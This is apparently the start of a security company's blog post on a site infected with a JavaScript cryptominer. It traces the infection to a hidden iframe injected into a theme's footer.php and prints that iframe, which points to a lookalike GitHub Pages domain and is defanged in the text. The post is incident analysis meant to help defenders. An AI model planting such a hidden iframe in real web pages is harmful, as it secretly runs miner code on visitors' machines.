Malicious Cryptominers from GitHub
Recently, a webmaster contacted us when his AVG antivirus reported that the JS:Miner-C [Trj] infection was found on their site.
Our investigation revealed a hidden iframe had been injected into the theme’s footer.php file:
<iframe src=”hxxps://wpupdates.github[.]io/ping/” style=”width:0;heigh:0;border:none;”></iframe>
When we opened the URL in a browser, the page was blank.